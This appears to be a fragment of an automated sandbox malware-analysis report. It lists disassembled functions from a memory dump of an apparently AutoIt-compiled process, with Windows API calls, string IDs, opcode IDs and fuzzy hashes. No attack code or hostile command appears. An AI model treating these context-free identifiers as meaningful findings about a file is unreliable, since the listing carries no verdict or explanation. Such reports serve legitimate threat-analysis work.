                           • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Window$DestroyMove
                          • String ID: static
                          • API String ID: 2139405536-2160076837
                          APIs
                          • _memset.LIBCMT ref: 00572F24
                          • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00572F5F
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                           • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: InfoItemMenu_memset
                          • String ID: 0
                          • API String ID: 2223754486-4108050209
                          APIs
                          • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00596B4E
                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00596B59
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                           • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: MessageSend
                          • String ID: Combobox
                          • API String ID: 3850602802-2096851135
                          APIs
                            • Part of subcall function 005129E2: GetWindowLongW.USER32(?,000000EB), ref: 005129F3
                          • GetActiveWindow.USER32 ref: 0059B1C3
                          • EnumChildWindows.USER32(?,0059AEA3,00000000), ref: 0059B23D
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                           • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Window$ActiveChildEnumLongWindows
                          • String ID: X
                          • API String ID: 3814560230-1481879230
                          APIs
                            • Part of subcall function 00512111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0051214F
                            • Part of subcall function 00512111: GetStockObject.GDI32(00000011), ref: 00512163
                            • Part of subcall function 00512111: SendMessageW.USER32(00000000,00000030,00000000), ref: 0051216D
                          • GetWindowRect.USER32(00000000,?), ref: 0059705E
                          • GetSysColor.USER32(00000012), ref: 00597078
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                           • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Window$ColorCreateMessageObjectRectSendStock
                          • String ID: static
                          • API String ID: 1983116058-2160076837
                          APIs
                          • GetWindowTextLengthW.USER32(00000000), ref: 00596D8F
                          • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00596D9E
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                           • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: LengthMessageSendTextWindow
                          • String ID: edit
                          • API String ID: 2978978980-2167791130
                          APIs
                          • _memset.LIBCMT ref: 00573036
                          • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00573055
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                           • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: InfoItemMenu_memset
                          • String ID: 0
                          • API String ID: 2223754486-4108050209
                          APIs
                          • DeleteObject.GDI32(?), ref: 0051351D
                          • DestroyWindow.USER32(?,?,00524E61), ref: 00513576
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                           • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: DeleteDestroyObjectWindow
                          • String ID: hZ
                          • API String ID: 2587070983-3824762921
                          APIs
                          • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 005826DC
                          • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00582705
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                           • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Internet$OpenOption
                          • String ID: <local>
                          • API String ID: 942729171-4266983199
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                           • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: _wcscmp
                          • String ID: 0.0.0.0$L,Z
                          • API String ID: 856254489-1023806
                          APIs
                            • Part of subcall function 005884A8: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00588265,?,00000000,?,?), ref: 005884BF
                          • inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00588268
                          • htons.WSOCK32(00000000,?,00000000), ref: 005882A5
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                           • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: ByteCharMultiWidehtonsinet_addr
                          • String ID: 255.255.255.255
                          • API String ID: 2496851823-2422070025
                          APIs
                            • Part of subcall function 00521A36: _memmove.LIBCMT ref: 00521A77
                            • Part of subcall function 0056B57D: GetClassNameW.USER32(?,?,000000FF), ref: 0056B5A0
                          • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 0056980E
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                           • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: ClassMessageNameSend_memmove
                          • String ID: ComboBox$ListBox
                          • API String ID: 372448540-1403004172
                          • Opcode ID: a5df5fa647eeb98f16f0557ddb2bbbabb6aa8cb16ca7dd3409643a515791d569
                          • Instruction ID: 253d77f2473ee7d11bed68fb9450f3a7c47839e603fb2757353c045ffa0c6586
                          • Opcode Fuzzy Hash: a5df5fa647eeb98f16f0557ddb2bbbabb6aa8cb16ca7dd3409643a515791d569
                          • Instruction Fuzzy Hash: BB01F575A41225AB8B14EBA4DC55DFE7B6DBFA3320B500619F862A32C1EF315D08C7D0
                          APIs
                          • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0051BC07
                            • Part of subcall function 00521821: _memmove.LIBCMT ref: 0052185B
                          • _wcscat.LIBCMT ref: 005534C3
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: FullNamePath_memmove_wcscat
                          • String ID: c]
                          • API String ID: 257928180-3208348081
                          • Opcode ID: 6717d182fdb3ca58633aa9e9024529999b6e88d694f89be4f75e5e1088172b83
                          • Instruction ID: 14ee164c1d4eab6ce6ca3c52239c73ae5abd9e92c8db64c2d743579c6d03eaa6
                          • Opcode Fuzzy Hash: 6717d182fdb3ca58633aa9e9024529999b6e88d694f89be4f75e5e1088172b83
                          • Instruction Fuzzy Hash: D411C83090021A97DB11EBA4984AEDE7FE8FF59350F1004A6B945D7291DF70DBC89B91
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: __fread_nolock_memmove
                          • String ID: EA06
                          • API String ID: 1988441806-3962188686
                          • Opcode ID: c505806431d9b91efe4621ff36d475dc439a26c62418710147d175ec226174d2
                          • Instruction ID: aab93b4ec7eb9fbbf8e59697aadf6ea84347b770636e26bf8f523f12d5832440
                          • Opcode Fuzzy Hash: c505806431d9b91efe4621ff36d475dc439a26c62418710147d175ec226174d2
                          • Instruction Fuzzy Hash: 7401F971D042186EDB28CAA8CC5AEAE7FF8EB01311F00819EF556D2181E474A614CB60
                          APIs
                            • Part of subcall function 00521A36: _memmove.LIBCMT ref: 00521A77
                            • Part of subcall function 0056B57D: GetClassNameW.USER32(?,?,000000FF), ref: 0056B5A0
                          • SendMessageW.USER32(?,00000180,00000000,?), ref: 00569706
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: ClassMessageNameSend_memmove
                          • String ID: ComboBox$ListBox
                          • API String ID: 372448540-1403004172
                          • Opcode ID: 9c1086a652e762e69af30fdd77f98f8373e8fd2126cff3cef515d2c2b8ca1256
                          • Instruction ID: e6bf6be859f6605f9f3d553bee5a971656b0704fb4196f5fab9df5fd7fcdc1ec
                          • Opcode Fuzzy Hash: 9c1086a652e762e69af30fdd77f98f8373e8fd2126cff3cef515d2c2b8ca1256
                          • Instruction Fuzzy Hash: F201D8B5A411156BDB14EB90D956EFF7FADBF62340F140029B402A32C1DE205E0896F5
                          APIs
                            • Part of subcall function 00521A36: _memmove.LIBCMT ref: 00521A77
                            • Part of subcall function 0056B57D: GetClassNameW.USER32(?,?,000000FF), ref: 0056B5A0
                          • SendMessageW.USER32(?,00000182,?,00000000), ref: 00569789
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: ClassMessageNameSend_memmove
                          • String ID: ComboBox$ListBox
                          • API String ID: 372448540-1403004172
                          • Opcode ID: 6472b5a382400ba7a5847cb218894553d66bba5e5ebc65b6a2eeef297fd44e2c
                          • Instruction ID: 6fb84f4db32a2304b85dc007396641700a2eced891baf8c41fdb7a404e053c49
                          • Opcode Fuzzy Hash: 6472b5a382400ba7a5847cb218894553d66bba5e5ebc65b6a2eeef297fd44e2c
                          • Instruction Fuzzy Hash: A401D4B5A511166A8B14EBA4D956EFF7BACEF62300B500125B801A32C1EA214F0892B1
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: __calloc_crt
                          • String ID: @R]
                          • API String ID: 3494438863-311182925
                          • Opcode ID: 4319d5e5dd3cdde2826f7cc78ae3bfecbab9f76408bcf24dfe15529c1b95eb77
                          • Instruction ID: 65d905869d2bc51d16901f659740c72d0efdc34df2e754f5ed072a045ace4568
                          • Opcode Fuzzy Hash: 4319d5e5dd3cdde2826f7cc78ae3bfecbab9f76408bcf24dfe15529c1b95eb77
                          • Instruction Fuzzy Hash: D1F0AF7634A317AAE7388B59BC01B612FA5F764720F20482FE140CA181E770D8829690
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: ClassName_wcscmp
                          • String ID: #32770
                          • API String ID: 2292705959-463685578
                          • Opcode ID: 60271037ce1362ede9d3bf4bb1170471045b0514c792ac25e3223f06f7aa7c40
                          • Instruction ID: ab4547ea1cccd38518e83da652d7521cd04e54da38d47670fa5bb810b083a51a
                          • Opcode Fuzzy Hash: 60271037ce1362ede9d3bf4bb1170471045b0514c792ac25e3223f06f7aa7c40
                          • Instruction Fuzzy Hash: E3E09B7290422D2BD7209A95AC09F9BFBACEB55761F010057BD08D3151E5A06A458BD1
                          APIs
                          • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00568683
                            • Part of subcall function 005334BA: _doexit.LIBCMT ref: 005334C4
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Message_doexit
                          • String ID: AutoIt$Error allocating memory.
                          • API String ID: 1993061046-4017498283
                          • Opcode ID: ff3db15e9b13ddb36383835f04901a29c0276052266bb9ce69688cd9ed020603
                          • Instruction ID: a9aa13bfebac461f46eca33d759318f484bab24e89d347f3794e07fadfeabd97
                          • Opcode Fuzzy Hash: ff3db15e9b13ddb36383835f04901a29c0276052266bb9ce69688cd9ed020603
                          • Instruction Fuzzy Hash: BBD05B313C531836D2153798EC1FFDA7F886F56B55F140455BB04561C34DD7959042D5
                          APIs
                          • GetSystemDirectoryW.KERNEL32(?), ref: 0054FFC1
                            • Part of subcall function 0058C4A1: LoadLibraryA.KERNEL32(kernel32.dll,?,005501AA,?), ref: 0058C4AF
                            • Part of subcall function 0058C4A1: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0058C4C1
                          • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 005501B9
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Library$AddressDirectoryFreeLoadProcSystem
                          • String ID: WIN_XPe
                          • API String ID: 582185067-3257408948
                          • Opcode ID: 161c5b8471d484f65361dcbe2c8a382c6ab9bf4095a9510867643e39878fdec7
                          • Instruction ID: f8db0126472004805589ea229a17e4c59436d9fb217b685c760628003f9549bb
                          • Opcode Fuzzy Hash: 161c5b8471d484f65361dcbe2c8a382c6ab9bf4095a9510867643e39878fdec7
                          • Instruction Fuzzy Hash: 98F03970819119EFCB15DB98C998AECBFB8BB0A308F200496E102A21A0C7704F88DF20
                          APIs
                          • DestroyIcon.USER32(,j]0j],005D6A2C,005D6890,?,00525A53,005D6A2C,005D6A30,?,00000004), ref: 00525823
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: DestroyIcon
                          • String ID: ,j]0j]$SZR,j]0j]
                          • API String ID: 1234817797-3602736661
                          • Opcode ID: 9fd3f7461e0316a75c7bcee8e67970d9149e658035df18f4e6bc93e1e9161e89
                          • Instruction ID: ddac7eb01083ffe0f3a531c0dfc16bf56613a83662acd23568ee607f365aac58
                          • Opcode Fuzzy Hash: 9fd3f7461e0316a75c7bcee8e67970d9149e658035df18f4e6bc93e1e9161e89
                          • Instruction Fuzzy Hash: 30E0C232014216EBE7200F08E8007A4FFE8FF22321F34C416E08056090E3F168A0DB90